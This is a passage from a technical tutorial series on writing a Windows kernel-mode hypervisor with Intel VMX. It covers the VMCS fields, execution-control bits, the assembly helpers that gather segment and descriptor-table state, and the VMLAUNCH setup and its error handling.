123456789typedef struct _VirtualMachineState{    UINT64 VMXON_REGION;                    // VMXON region    UINT64 VMCS_REGION;                     // VMCS region    UINT64 EPTP;                            // Extended-Page-Table Pointer    UINT64 VMM_Stack;                       // Stack for VMM in VM-Exit State    UINT64 MSRBitMap;                       // MSRBitMap Virtual Address    UINT64 MSRBitMapPhysical;               // MSRBitMap Physical Address} VirtualMachineState, *PVirtualMachineState;

Note that its not the final _VirtualMachineState structure and we’ll enhance it in future parts.

Preparing to launch VM

In this part, we’re just trying to test our hypervisor in our driver, in the future parts we add some user-mode interactions with our driver so let’s start with modifying our DriverEntry as it’s the first function that executes when our driver is loaded.

Below all the preparation from Part 2, we add the following lines to use our Part 4 (EPT) structures :

123 // Initiating EPTP and VMX PEPTP EPTP = Initialize_EPTP(); Initiate_VMX();

I added an export to a global variable called “VirtualGuestMemoryAddress” that holds the address of where our guest code starts.

Now let’s fill our allocated pages with \xf4 which stands for HLT instruction. I choose HLT because with some special configuration (described below) it’ll cause VM-Exit and return the code to the Host handler.

Let’s create a function which is responsible for running our virtual machine on a specific core.

1void LaunchVM(int ProcessorID , PEPTP EPTP);

I set the ProcessorID to 0, so we’re in the 0th logical processor.

Keep in mind that every logical core has its own VMCS and if you want your guest code to run in other logical processor, you should configure them separately.

Now we should set the affinity to the specific logical processor using Windows KeSetSystemAffinityThread function and make sure to choose the specific core’s vmState as each core has its own separate VMXON and VMCS region.

1234567    KAFFINITY kAffinityMask;        kAffinityMask = ipow(2, ProcessorID);        KeSetSystemAffinityThread(kAffinityMask);         DbgPrint(«[*]\t\tCurrent thread is executing in %d th logical processor.\n», ProcessorID);         PAGED_CODE();

Now, we should allocate a specific stack so that every time a VM-Exit occurs then we can save the registers and calling other Host functions.

I prefer to allocate a separate location for stack instead of using current RSP of the driver but you can use current stack (RSP) too.

The following lines are for allocating and zeroing the stack of our VM-Exit handler.

12345678910  // Allocate stack for the VM Exit Handler. UINT64 VMM_STACK_VA = ExAllocatePoolWithTag(NonPagedPool, VMM_STACK_SIZE, POOLTAG); vmState[ProcessorID].VMM_Stack = VMM_STACK_VA;  if (vmState[ProcessorID].VMM_Stack == NULL) { DbgPrint(«[*] Error in allocating VMM Stack.\n»); return; } RtlZeroMemory(vmState[ProcessorID].VMM_Stack, VMM_STACK_SIZE);

Same as above, allocating a page for MSR Bitmap and adding it to vmState, I’ll describe about them later in this topic.

1234567891011 // Allocate memory for MSRBitMap vmState[ProcessorID].MSRBitMap = MmAllocateNonCachedMemory(PAGE_SIZE);  // should be aligned if (vmState[ProcessorID].MSRBitMap == NULL) { DbgPrint(«[*] Error in allocating MSRBitMap.\n»); return; } RtlZeroMemory(vmState[ProcessorID].MSRBitMap, PAGE_SIZE); vmState[ProcessorID].MSRBitMapPhysical = VirtualAddress_to_PhysicalAddress(vmState[ProcessorID].MSRBitMap); 

Now it’s time to clear our VMCS state and load it as the current VMCS in the specific processor (in our case the 0th logical processor).

The Clear_VMCS_State and Load_VMCS are described above :

123456789101112  // Clear the VMCS State if (!Clear_VMCS_State(&vmState[ProcessorID])) { goto ErrorReturn; }  // Load VMCS (Set the Current VMCS) if (!Load_VMCS(&vmState[ProcessorID])) { goto ErrorReturn; } 

Now it’s time to setup VMCS, A detailed explanation of VMCS setup is available later in this topic.

1234  DbgPrint(«[*] Setting up VMCS.\n»); Setup_VMCS(&vmState[ProcessorID], EPTP); 

The last step is to execute the VMLAUNCH but we shouldn’t forget about saving the current state of the stack (RSP & RBP) because during the execution of Guest code and after returning from VM-Exit, we have to now the current state and return from it. It’s because if you leave the driver with wrong RSP & RBP then you definitely see a BSOD.

12  Save_VMXOFF_State();

Saving a return point

For Save_VMXOFF_State() , I declared two global variables called g_StackPointerForReturningg_BasePointerForReturning. No need to save RIP as the return address is always available in the stack. Just EXTERN it in the assembly file :

123 EXTERN g_StackPointerForReturning:QWORDEXTERN g_BasePointerForReturning:QWORD

The implementation of Save_VMXOFF_State :

123456Save_VMXOFF_State PROC PUBLICMOV g_StackPointerForReturning,rspMOV g_BasePointerForReturning,rbpret Save_VMXOFF_State ENDP

Returning to the previous state

As we saved the current state, if we want to return to the previous state, we have to restore RSP & RBP and clear the stack position and eventually a RET instruction. (I Also add a VMXOFF because it should be executed before return.)

123456789101112131415161718192021222324Restore_To_VMXOFF_State PROC PUBLIC VMXOFF  ; turn it off before existing MOV rsp, g_StackPointerForReturningMOV rbp, g_BasePointerForReturning ; make rsp point to a correct return pointADD rsp,8 ; return Truexor rax,raxmov rax,1 ; return section mov     rbx, [rsp+28h+8h]mov     rsi, [rsp+28h+10h]add     rsp, 020hpop     rdi ret Restore_To_VMXOFF_State ENDP

The “return section” is defined like this because I saw the return section of LaunchVM in IDA Pro.

LaunchVM Return Frame

One important thing that can’t be easily ignored from the above picture is I have such a gorgeous, magnificent & super beautiful IDA PRO theme. I always proud of myself for choosing themes like this ! 


Now it’s time to executed the VMLAUNCH.

12345678910  __vmx_vmlaunch();  // if VMLAUNCH succeed will never be here ! ULONG64 ErrorCode = 0; __vmx_vmread(VM_INSTRUCTION_ERROR, &ErrorCode); __vmx_off(); DbgPrint(«[*] VMLAUNCH Error : 0x%llx\n», ErrorCode); DbgBreakPoint(); 

As the comment describes, if we VMLAUNCH succeed we’ll never execute the other lines. If there is an error in the state of VMCS (which is a common problem) then we have to run VMREAD and read the error code from VM_INSTRUCTION_ERROR field of VMCS, also VMXOFF and print the error. DbgBreakPoint is just a debug breakpoint (int 3) and it can be useful only if you’re working with a remote kernel Windbg Debugger. It’s clear that you can’t test it in your system because executing a cc in the kernel will freeze your system as long as there is no debugger to catch it so it’s highly recommended to create a remote Kernel Debugging machine and test your codes.

Also, It can’t be tested on a remote VMWare debugging (and other virtual machine debugging tools) because nested VMX is not supported in current Intel processors.

Remember we’re still in LaunchVM function and __vmx_vmlaunch() is the intrinsic function for VMLAUNCH & __vmx_vmread is for VMREAD instruction.

Now it’s time to read some theories before configuring VMCS.

VMX Controls

VM-Execution Controls

In order to control our guest features, we have to set some fields in our VMCS. The following tables represent the Primary Processor-Based VM-Execution Controls and Secondary Processor-Based VM-Execution Controls.


We define the above table like this:

123456789101112131415161718192021#define CPU_BASED_VIRTUAL_INTR_PENDING        0x00000004#define CPU_BASED_USE_TSC_OFFSETING           0x00000008#define CPU_BASED_HLT_EXITING                 0x00000080#define CPU_BASED_INVLPG_EXITING              0x00000200#define CPU_BASED_MWAIT_EXITING               0x00000400#define CPU_BASED_RDPMC_EXITING               0x00000800#define CPU_BASED_RDTSC_EXITING               0x00001000#define CPU_BASED_CR3_LOAD_EXITING            0x00008000#define CPU_BASED_CR3_STORE_EXITING           0x00010000#define CPU_BASED_CR8_LOAD_EXITING            0x00080000#define CPU_BASED_CR8_STORE_EXITING           0x00100000#define CPU_BASED_TPR_SHADOW                  0x00200000#define CPU_BASED_VIRTUAL_NMI_PENDING         0x00400000#define CPU_BASED_MOV_DR_EXITING              0x00800000#define CPU_BASED_UNCOND_IO_EXITING           0x01000000#define CPU_BASED_ACTIVATE_IO_BITMAP          0x02000000#define CPU_BASED_MONITOR_TRAP_FLAG           0x08000000#define CPU_BASED_ACTIVATE_MSR_BITMAP         0x10000000#define CPU_BASED_MONITOR_EXITING             0x20000000#define CPU_BASED_PAUSE_EXITING               0x40000000#define CPU_BASED_ACTIVATE_SECONDARY_CONTROLS 0x80000000

In the earlier versions of VMX, there is nothing like Secondary Processor-Based VM-Execution Controls. Now if you want to use the secondary table you have to set the 31st bit of the first table otherwise it’s like the secondary table field with zeros.


The definition of the above table is this (we ignore some bits, you can define them if you want to use them in your hypervisor):

12345#define CPU_BASED_CTL2_ENABLE_EPT            0x2#define CPU_BASED_CTL2_RDTSCP                0x8#define CPU_BASED_CTL2_ENABLE_VPID            0x20#define CPU_BASED_CTL2_UNRESTRICTED_GUEST    0x80#define CPU_BASED_CTL2_ENABLE_VMFUNC        0x2000

VM-entry Control Bits

The VM-entry controls constitute a 32-bit vector that governs the basic operation of VM entries.

12345// VM-entry Control Bits #define VM_ENTRY_IA32E_MODE             0x00000200#define VM_ENTRY_SMM                    0x00000400#define VM_ENTRY_DEACT_DUAL_MONITOR     0x00000800#define VM_ENTRY_LOAD_GUEST_PAT         0x00004000

VM-exit Control Bits

The VM-exit controls constitute a 32-bit vector that governs the basic operation of VM exits.

12345// VM-exit Control Bits #define VM_EXIT_IA32E_MODE              0x00000200#define VM_EXIT_ACK_INTR_ON_EXIT        0x00008000#define VM_EXIT_SAVE_GUEST_PAT          0x00040000#define VM_EXIT_LOAD_HOST_PAT           0x00080000

PIN-Based Execution Control

The pin-based VM-execution controls constitute a 32-bit vector that governs the handling of asynchronous events (for example: interrupts). We’ll use it in the future parts, but for now let define it in our Hypervisor.

123456// PIN-Based Execution#define PIN_BASED_VM_EXECUTION_CONTROLS_EXTERNAL_INTERRUPT                 0x00000001#define PIN_BASED_VM_EXECUTION_CONTROLS_NMI_EXITING                         0x00000004#define PIN_BASED_VM_EXECUTION_CONTROLS_VIRTUAL_NMI                         0x00000010#define PIN_BASED_VM_EXECUTION_CONTROLS_ACTIVE_VMX_TIMER                 0x00000020 #define PIN_BASED_VM_EXECUTION_CONTROLS_PROCESS_POSTED_INTERRUPTS        0x00000040

Interruptibility State

The guest-state area includes the following fields that characterize guest state but which do not correspond to processor registers:
Activity state (32 bits). This field identifies the logical processor’s activity state. When a logical processor is executing instructions normally, it is in the active state. Execution of certain instructions and the occurrence of certain events may cause a logical processor to transition to an inactive state in which it ceases to execute instructions.
The following activity states are defined:
— 0: Active. The logical processor is executing instructions normally.

— 1: HLT. The logical processor is inactive because it executed the HLT instruction.
— 2: Shutdown. The logical processor is inactive because it incurred a triple fault1 or some other serious error.
— 3: Wait-for-SIPI. The logical processor is inactive because it is waiting for a startup-IPI (SIPI).

• Interruptibility state (32 bits). The IA-32 architecture includes features that permit certain events to be blocked for a period of time. This field contains information about such blocking. Details and the format of this field are given in Table below.


Configuring VMCS

Gathering Machine state for VMCS

In order to configure our Guest-State & Host-State we need to have details about current system state, e.g Global Descriptor Table Address, Interrupt Descriptor Table Add and Read all the Segment Registers.

These functions describe how all of these data can be gathered.

GDT Base :

123456Get_GDT_Base PROC    LOCAL   gdtr[10]:BYTE    sgdt    gdtr    mov     rax, QWORD PTR gdtr[2]    retGet_GDT_Base ENDP

CS segment register:

1234GetCs PROC    mov     rax, cs    retGetCs ENDP

DS segment register:

1234GetDs PROC    mov     rax, ds    retGetDs ENDP

ES segment register:

1234GetEs PROC    mov     rax, es    retGetEs ENDP

SS segment register:

1234GetSs PROC    mov     rax, ss    retGetSs ENDP

FS segment register:

1234GetFs PROC    mov     rax, fs    retGetFs ENDP

GS segment register:

1234GetGs PROC    mov     rax, gs    retGetGs ENDP


1234GetLdtr PROC    sldt    rax    retGetLdtr ENDP

TR (task register):

1234GetTr PROC    str rax    retGetTr ENDP

Interrupt Descriptor Table:

1234567Get_IDT_Base PROC    LOCAL   idtr[10]:BYTE     sidt    idtr    mov     rax, QWORD PTR idtr[2]    retGet_IDT_Base ENDP

GDT Limit:

1234567Get_GDT_Limit PROC    LOCAL   gdtr[10]:BYTE     sgdt    gdtr    mov     ax, WORD PTR gdtr[0]    retGet_GDT_Limit ENDP

IDT Limit:

1234567Get_IDT_Limit PROC    LOCAL   idtr[10]:BYTE     sidt    idtr    mov     ax, WORD PTR idtr[0]    retGet_IDT_Limit ENDP


12345Get_RFLAGS PROC    pushfq    pop     rax    retGet_RFLAGS ENDP

Setting up VMCS

Let’s get down to business (We have a long way to go).

This section starts with defining a function called Setup_VMCS.

1BOOLEAN Setup_VMCS(IN PVirtualMachineState vmState, IN PEPTP EPTP);

This function is responsible for configuring all of the options related to VMCS and of course the Guest & Host state.

These task needs a special instruction called “VMWRITE”.

VMWRITE, writes the contents of a primary source operand (register or memory) to a specified field in a VMCS. In VMX root operation, the instruction writes to the current VMCS. If executed in VMX non-root operation, the instruction writes to the VMCS referenced by the VMCS link pointer field in the current VMCS.

The VMCS field is specified by the VMCS-field encoding contained in the register secondary source operand. 

The following enum contains most of the VMCS field need for VMWRITE & VMREAD instructions. (newer processors add newer fields.)

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134enum VMCS_FIELDS { GUEST_ES_SELECTOR = 0x00000800, GUEST_CS_SELECTOR = 0x00000802, GUEST_SS_SELECTOR = 0x00000804, GUEST_DS_SELECTOR = 0x00000806, GUEST_FS_SELECTOR = 0x00000808, GUEST_GS_SELECTOR = 0x0000080a, GUEST_LDTR_SELECTOR = 0x0000080c, GUEST_TR_SELECTOR = 0x0000080e, HOST_ES_SELECTOR = 0x00000c00, HOST_CS_SELECTOR = 0x00000c02, HOST_SS_SELECTOR = 0x00000c04, HOST_DS_SELECTOR = 0x00000c06, HOST_FS_SELECTOR = 0x00000c08, HOST_GS_SELECTOR = 0x00000c0a, HOST_TR_SELECTOR = 0x00000c0c, IO_BITMAP_A = 0x00002000, IO_BITMAP_A_HIGH = 0x00002001, IO_BITMAP_B = 0x00002002, IO_BITMAP_B_HIGH = 0x00002003, MSR_BITMAP = 0x00002004, MSR_BITMAP_HIGH = 0x00002005, VM_EXIT_MSR_STORE_ADDR = 0x00002006, VM_EXIT_MSR_STORE_ADDR_HIGH = 0x00002007, VM_EXIT_MSR_LOAD_ADDR = 0x00002008, VM_EXIT_MSR_LOAD_ADDR_HIGH = 0x00002009, VM_ENTRY_MSR_LOAD_ADDR = 0x0000200a, VM_ENTRY_MSR_LOAD_ADDR_HIGH = 0x0000200b, TSC_OFFSET = 0x00002010, TSC_OFFSET_HIGH = 0x00002011, VIRTUAL_APIC_PAGE_ADDR = 0x00002012, VIRTUAL_APIC_PAGE_ADDR_HIGH = 0x00002013, VMFUNC_CONTROLS = 0x00002018, VMFUNC_CONTROLS_HIGH = 0x00002019, EPT_POINTER = 0x0000201A, EPT_POINTER_HIGH = 0x0000201B, EPTP_LIST = 0x00002024, EPTP_LIST_HIGH = 0x00002025, GUEST_PHYSICAL_ADDRESS = 0x2400, GUEST_PHYSICAL_ADDRESS_HIGH = 0x2401, VMCS_LINK_POINTER = 0x00002800, VMCS_LINK_POINTER_HIGH = 0x00002801, GUEST_IA32_DEBUGCTL = 0x00002802, GUEST_IA32_DEBUGCTL_HIGH = 0x00002803, PIN_BASED_VM_EXEC_CONTROL = 0x00004000, CPU_BASED_VM_EXEC_CONTROL = 0x00004002, EXCEPTION_BITMAP = 0x00004004, PAGE_FAULT_ERROR_CODE_MASK = 0x00004006, PAGE_FAULT_ERROR_CODE_MATCH = 0x00004008, CR3_TARGET_COUNT = 0x0000400a, VM_EXIT_CONTROLS = 0x0000400c, VM_EXIT_MSR_STORE_COUNT = 0x0000400e, VM_EXIT_MSR_LOAD_COUNT = 0x00004010, VM_ENTRY_CONTROLS = 0x00004012, VM_ENTRY_MSR_LOAD_COUNT = 0x00004014, VM_ENTRY_INTR_INFO_FIELD = 0x00004016, VM_ENTRY_EXCEPTION_ERROR_CODE = 0x00004018, VM_ENTRY_INSTRUCTION_LEN = 0x0000401a, TPR_THRESHOLD = 0x0000401c, SECONDARY_VM_EXEC_CONTROL = 0x0000401e, VM_INSTRUCTION_ERROR = 0x00004400, VM_EXIT_REASON = 0x00004402, VM_EXIT_INTR_INFO = 0x00004404, VM_EXIT_INTR_ERROR_CODE = 0x00004406, IDT_VECTORING_INFO_FIELD = 0x00004408, IDT_VECTORING_ERROR_CODE = 0x0000440a, VM_EXIT_INSTRUCTION_LEN = 0x0000440c, VMX_INSTRUCTION_INFO = 0x0000440e, GUEST_ES_LIMIT = 0x00004800, GUEST_CS_LIMIT = 0x00004802, GUEST_SS_LIMIT = 0x00004804, GUEST_DS_LIMIT = 0x00004806, GUEST_FS_LIMIT = 0x00004808, GUEST_GS_LIMIT = 0x0000480a, GUEST_LDTR_LIMIT = 0x0000480c, GUEST_TR_LIMIT = 0x0000480e, GUEST_GDTR_LIMIT = 0x00004810, GUEST_IDTR_LIMIT = 0x00004812, GUEST_ES_AR_BYTES = 0x00004814, GUEST_CS_AR_BYTES = 0x00004816, GUEST_SS_AR_BYTES = 0x00004818, GUEST_DS_AR_BYTES = 0x0000481a, GUEST_FS_AR_BYTES = 0x0000481c, GUEST_GS_AR_BYTES = 0x0000481e, GUEST_LDTR_AR_BYTES = 0x00004820, GUEST_TR_AR_BYTES = 0x00004822, GUEST_INTERRUPTIBILITY_INFO = 0x00004824, GUEST_ACTIVITY_STATE = 0x00004826, GUEST_SM_BASE = 0x00004828, GUEST_SYSENTER_CS = 0x0000482A, HOST_IA32_SYSENTER_CS = 0x00004c00, CR0_GUEST_HOST_MASK = 0x00006000, CR4_GUEST_HOST_MASK = 0x00006002, CR0_READ_SHADOW = 0x00006004, CR4_READ_SHADOW = 0x00006006, CR3_TARGET_VALUE0 = 0x00006008, CR3_TARGET_VALUE1 = 0x0000600a, CR3_TARGET_VALUE2 = 0x0000600c, CR3_TARGET_VALUE3 = 0x0000600e, EXIT_QUALIFICATION = 0x00006400, GUEST_LINEAR_ADDRESS = 0x0000640a, GUEST_CR0 = 0x00006800, GUEST_CR3 = 0x00006802, GUEST_CR4 = 0x00006804, GUEST_ES_BASE = 0x00006806, GUEST_CS_BASE = 0x00006808, GUEST_SS_BASE = 0x0000680a, GUEST_DS_BASE = 0x0000680c, GUEST_FS_BASE = 0x0000680e, GUEST_GS_BASE = 0x00006810, GUEST_LDTR_BASE = 0x00006812, GUEST_TR_BASE = 0x00006814, GUEST_GDTR_BASE = 0x00006816, GUEST_IDTR_BASE = 0x00006818, GUEST_DR7 = 0x0000681a, GUEST_RSP = 0x0000681c, GUEST_RIP = 0x0000681e, GUEST_RFLAGS = 0x00006820, GUEST_PENDING_DBG_EXCEPTIONS = 0x00006822, GUEST_SYSENTER_ESP = 0x00006824, GUEST_SYSENTER_EIP = 0x00006826, HOST_CR0 = 0x00006c00, HOST_CR3 = 0x00006c02, HOST_CR4 = 0x00006c04, HOST_FS_BASE = 0x00006c06, HOST_GS_BASE = 0x00006c08, HOST_TR_BASE = 0x00006c0a, HOST_GDTR_BASE = 0x00006c0c, HOST_IDTR_BASE = 0x00006c0e, HOST_IA32_SYSENTER_ESP = 0x00006c10, HOST_IA32_SYSENTER_EIP = 0x00006c12, HOST_RSP = 0x00006c14, HOST_RIP = 0x00006c16,};

Ok, let’s continue with our configuration.

The next step is configuring host Segment Registers.

1234567 __vmx_vmwrite(HOST_ES_SELECTOR, GetEs() & 0xF8); __vmx_vmwrite(HOST_CS_SELECTOR, GetCs() & 0xF8); __vmx_vmwrite(HOST_SS_SELECTOR, GetSs() & 0xF8); __vmx_vmwrite(HOST_DS_SELECTOR, GetDs() & 0xF8); __vmx_vmwrite(HOST_FS_SELECTOR, GetFs() & 0xF8); __vmx_vmwrite(HOST_GS_SELECTOR, GetGs() & 0xF8); __vmx_vmwrite(HOST_TR_SELECTOR, GetTr() & 0xF8);

Keep in mind, those fields that start with HOST_ are related to the state in which the hypervisor sets whenever a VM-Exit occurs and those which start with GUEST_ are related to to the state in which the hypervisor sets for guest when a VMLAUNCH executed.

The purpose of & 0xF8 is that Intel mentioned that the three less significant bits must be cleared and otherwise it leads to error when you execute VMLAUNCH with Invalid Host State error.

VMCS_LINK_POINTER should be 0xffffffffffffffff.

12 // Setting the link pointer to the required value for 4KB VMCS. __vmx_vmwrite(VMCS_LINK_POINTER, ~0ULL);

The rest of this topic, intends to perform the VMX instructions in the current state of machine, so must of the guest and host configurations should be the same. In the future parts we’ll configure them to a separate guest layout.

Let’s configure GUEST_IA32_DEBUGCTL.

The IA32_DEBUGCTL MSR provides bit field controls to enable debug trace interrupts, debug trace stores, trace messages enable, single stepping on branches, last branch record recording, and to control freezing of LBR stack.

In short : LBR is a mechanism that provides processor with some recording of registers.

We don’t use them but let’s configure them to the current machine’s MSR_IA32_DEBUGCTL and you can see that __readmsr is the intrinsic function for RDMSR.

1234  __vmx_vmwrite(GUEST_IA32_DEBUGCTL, __readmsr(MSR_IA32_DEBUGCTL) & 0xFFFFFFFF); __vmx_vmwrite(GUEST_IA32_DEBUGCTL_HIGH, __readmsr(MSR_IA32_DEBUGCTL) >> 32); 

For configuring TSC you should modify the following values, I don’t have a precise explanation about it, so let them be zeros.

Note that, values that we put Zero on them can be ignored and if you don’t modify them, it’s like you put zero on them.

123456789101112 /* Time-stamp counter offset */ __vmx_vmwrite(TSC_OFFSET, 0); __vmx_vmwrite(TSC_OFFSET_HIGH, 0);  __vmx_vmwrite(PAGE_FAULT_ERROR_CODE_MASK, 0); __vmx_vmwrite(PAGE_FAULT_ERROR_CODE_MATCH, 0);  __vmx_vmwrite(VM_EXIT_MSR_STORE_COUNT, 0); __vmx_vmwrite(VM_EXIT_MSR_LOAD_COUNT, 0);  __vmx_vmwrite(VM_ENTRY_MSR_LOAD_COUNT, 0); __vmx_vmwrite(VM_ENTRY_INTR_INFO_FIELD, 0);

This time, we’ll configure Segment Registers and other GDT for our Host (When VM-Exit occurs).

12345678910 GdtBase = Get_GDT_Base();  FillGuestSelectorData((PVOID)GdtBase, ES, GetEs()); FillGuestSelectorData((PVOID)GdtBase, CS, GetCs()); FillGuestSelectorData((PVOID)GdtBase, SS, GetSs()); FillGuestSelectorData((PVOID)GdtBase, DS, GetDs()); FillGuestSelectorData((PVOID)GdtBase, FS, GetFs()); FillGuestSelectorData((PVOID)GdtBase, GS, GetGs()); FillGuestSelectorData((PVOID)GdtBase, LDTR, GetLdtr()); FillGuestSelectorData((PVOID)GdtBase, TR, GetTr());

Get_GDT_Base is defined above, in the process of gathering information for our VMCS.

FillGuestSelectorData is responsible for setting the GUEST selector, attributes, limit, and base for VMCS. It implemented as below :

123456789101112131415161718192021void FillGuestSelectorData( __in PVOID GdtBase, __in ULONG Segreg, __in USHORT Selector){ SEGMENT_SELECTOR SegmentSelector = { 0 }; ULONG            uAccessRights;  GetSegmentDescriptor(&SegmentSelector, Selector, GdtBase); uAccessRights = ((PUCHAR)& SegmentSelector.ATTRIBUTES)[0] + (((PUCHAR)& SegmentSelector.ATTRIBUTES)[1] << 12);  if (!Selector) uAccessRights |= 0x10000;  __vmx_vmwrite(GUEST_ES_SELECTOR + Segreg * 2, Selector); __vmx_vmwrite(GUEST_ES_LIMIT + Segreg * 2, SegmentSelector.LIMIT); __vmx_vmwrite(GUEST_ES_AR_BYTES + Segreg * 2, uAccessRights); __vmx_vmwrite(GUEST_ES_BASE + Segreg * 2, SegmentSelector.BASE); }

The function body for GetSegmentDescriptor :

123456789101112131415161718192021222324252627282930313233 BOOLEAN GetSegmentDescriptor(IN PSEGMENT_SELECTOR SegmentSelector, IN USHORT Selector, IN PUCHAR GdtBase){ PSEGMENT_DESCRIPTOR SegDesc;  if (!SegmentSelector) return FALSE;  if (Selector & 0x4) { return FALSE; }  SegDesc = (PSEGMENT_DESCRIPTOR)((PUCHAR)GdtBase + (Selector & ~0x7));  SegmentSelector->SEL = Selector; SegmentSelector->BASE = SegDesc->BASE0 | SegDesc->BASE1 << 16 | SegDesc->BASE2 << 24; SegmentSelector->LIMIT = SegDesc->LIMIT0 | (SegDesc->LIMIT1ATTR1 & 0xf) << 16; SegmentSelector->ATTRIBUTES.UCHARs = SegDesc->ATTR0 | (SegDesc->LIMIT1ATTR1 & 0xf0) << 4;  if (!(SegDesc->ATTR0 & 0x10)) { // LA_ACCESSED ULONG64 tmp; // this is a TSS or callgate etc, save the base high part tmp = (*(PULONG64)((PUCHAR)SegDesc + 8)); SegmentSelector->BASE = (SegmentSelector->BASE & 0xffffffff) | (tmp << 32); }  if (SegmentSelector->ATTRIBUTES.Fields.G) { // 4096-bit granularity is enabled for this segment, scale the limit SegmentSelector->LIMIT = (SegmentSelector->LIMIT << 12) + 0xfff; }  return TRUE;}

Also, there is another MSR called IA32_KERNEL_GS_BASE that is used to set the kernel GS base. whenever you run instructions like SYSCALL and enter to the ring 0, you need to change the current GS register and that can be done using SWAPGS. This instruction copies the content of IA32_KERNEL_GS_BASE into the IA32_GS_BASE and now it’s used in the kernel when you want to re-enter user-mode, you should change the user-mode GS Base. MSR_FS_BASE on the other hand, don’t have a kernel base because it used in 32-Bit mode while you have a 64-bit (long mode) kernel.


12 __vmx_vmwrite(GUEST_INTERRUPTIBILITY_INFO, 0); __vmx_vmwrite(GUEST_ACTIVITY_STATE, 0);   //Active state

Now we reach to the most important part of our VMCS and it’s the configuration of CPU_BASED_VM_EXEC_CONTROL and SECONDARY_VM_EXEC_CONTROL.

These fields enable and disable some important features of guest, e.g you can configure VMCS to cause a VM-Exit whenever an execution of HLT instruction detected (in Guest). Please check the VM-Execution Controls parts above for a detailed description.


As you can see we set CPU_BASED_HLT_EXITING that will cause the VM-Exit on HLT and activate secondary controls using CPU_BASED_ACTIVATE_SECONDARY_CONTROLS.

In the secondary controls, we used CPU_BASED_CTL2_RDTSCP and for now comment CPU_BASED_CTL2_ENABLE_EPT because we don’t need to deal with EPT in this part. In the future parts, I describe using EPT or Extended Page Table that we configured in the 4th part.

The description of PIN_BASED_VM_EXEC_CONTROLVM_EXIT_CONTROLS and VM_ENTRY_CONTROLS is available above but for now, let zero them.

1234 __vmx_vmwrite(PIN_BASED_VM_EXEC_CONTROL, AdjustControls(0, MSR_IA32_VMX_PINBASED_CTLS)); __vmx_vmwrite(VM_EXIT_CONTROLS, AdjustControls(VM_EXIT_IA32E_MODE | VM_EXIT_ACK_INTR_ON_EXIT, MSR_IA32_VMX_EXIT_CTLS)); __vmx_vmwrite(VM_ENTRY_CONTROLS, AdjustControls(VM_ENTRY_IA32E_MODE, MSR_IA32_VMX_ENTRY_CTLS)); 

Also, the AdjustControls is defined like this:

123456789ULONG AdjustControls(IN ULONG Ctl, IN ULONG Msr){ MSR MsrValue = { 0 };  MsrValue.Content = __readmsr(Msr); Ctl &= MsrValue.High;     /* bit == 0 in high word ==> must be zero */ Ctl |= MsrValue.Low;      /* bit == 1 in low word  ==> must be one  */ return Ctl;}

Next step is setting Control Register for guest and host, we set them to the same value using intrinsic functions.

12345678910 __vmx_vmwrite(GUEST_CR0, __readcr0()); __vmx_vmwrite(GUEST_CR3, __readcr3()); __vmx_vmwrite(GUEST_CR4, __readcr4());  __vmx_vmwrite(GUEST_DR7, 0x400);  __vmx_vmwrite(HOST_CR0, __readcr0()); __vmx_vmwrite(HOST_CR3, __readcr3()); __vmx_vmwrite(HOST_CR4, __readcr4()); 

The next part is setting up IDT and GDT’s Base and Limit for our guest.

1234 __vmx_vmwrite(GUEST_GDTR_BASE, Get_GDT_Base()); __vmx_vmwrite(GUEST_IDTR_BASE, Get_IDT_Base()); __vmx_vmwrite(GUEST_GDTR_LIMIT, Get_GDT_Limit()); __vmx_vmwrite(GUEST_IDTR_LIMIT, Get_IDT_Limit());

Set the RFLAGS.

1 __vmx_vmwrite(GUEST_RFLAGS, Get_RFLAGS());

If you want to use SYSENTER in your guest then you should configure the following MSRs. It’s not important to set these values in x64 Windows because Windows doesn’t support SYSENTER in x64 versions of Windows, It uses SYSCALL instead and for 32-bit processes, first change the current execution mode to long-mode (using Heaven’s Gate technique) but in 32-bit processors these fields are mandatory.

1234567 __vmx_vmwrite(GUEST_SYSENTER_CS, __readmsr(MSR_IA32_SYSENTER_CS)); __vmx_vmwrite(GUEST_SYSENTER_EIP, __readmsr(MSR_IA32_SYSENTER_EIP)); __vmx_vmwrite(GUEST_SYSENTER_ESP, __readmsr(MSR_IA32_SYSENTER_ESP)); __vmx_vmwrite(HOST_IA32_SYSENTER_CS, __readmsr(MSR_IA32_SYSENTER_CS)); __vmx_vmwrite(HOST_IA32_SYSENTER_EIP, __readmsr(MSR_IA32_SYSENTER_EIP)); __vmx_vmwrite(HOST_IA32_SYSENTER_ESP, __readmsr(MSR_IA32_SYSENTER_ESP)); 


12345678 GetSegmentDescriptor(&SegmentSelector, GetTr(), (PUCHAR)Get_GDT_Base()); __vmx_vmwrite(HOST_TR_BASE, SegmentSelector.BASE);  __vmx_vmwrite(HOST_FS_BASE, __readmsr(MSR_FS_BASE)); __vmx_vmwrite(HOST_GS_BASE, __readmsr(MSR_GS_BASE));  __vmx_vmwrite(HOST_GDTR_BASE, Get_GDT_Base()); __vmx_vmwrite(HOST_IDTR_BASE, Get_IDT_Base());

The next important part is to set the RIP and RSP of the guest when a VMLAUNCH executes it starts with RIP you configured in this part and RIP and RSP of the host when a VM-Exit occurs. It’s pretty clear that Host RIP should point to a function that is responsible for managing VMX Events based on return code and decide to execute a VMRESUME or turn off hypervisor using VMXOFF.

123456789 // left here just for test __vmx_vmwrite(0, (ULONG64)VirtualGuestMemoryAddress);     //setup guest sp __vmx_vmwrite(GUEST_RIP, (ULONG64)VirtualGuestMemoryAddress);     //setup guest ip    __vmx_vmwrite(HOST_RSP, ((ULONG64)vmState->VMM_Stack + VMM_STACK_SIZE — 1)); __vmx_vmwrite(HOST_RIP, (ULONG64)VMExitHandler); 

HOST_RSP points to VMM_Stack that we allocated above and HOST_RIP points to VMExitHandler (an assembly written function that described below). GUEST_RIP points to VirtualGuestMemoryAddress(the global variable that we configured during EPT initialization) and GUEST_RSP to zero because we don’t put any instruction that uses stack so for a real-world example it should point to writeable different address.

Setting these fields to a Host Address will not cause a problem as long as we have a same CR3 in our guest state so all the addresses are mapped exactly the same as the host.

Done ! Our VMCS is almost ready.

Checking VMCS Layout

Unfortunatly, checking VMCS Layout is not as straight as the other parts, you have to control all the checklists described in [CHAPTER 26] VM ENTRIES from Intel’s 64 and IA-32 Architectures Software Developer’s Manual including the following sections:


The hardest part of this process is when you have no idea about the incorrect part of your VMCS layout or on the other hand when you miss something that eventually causes the failure.

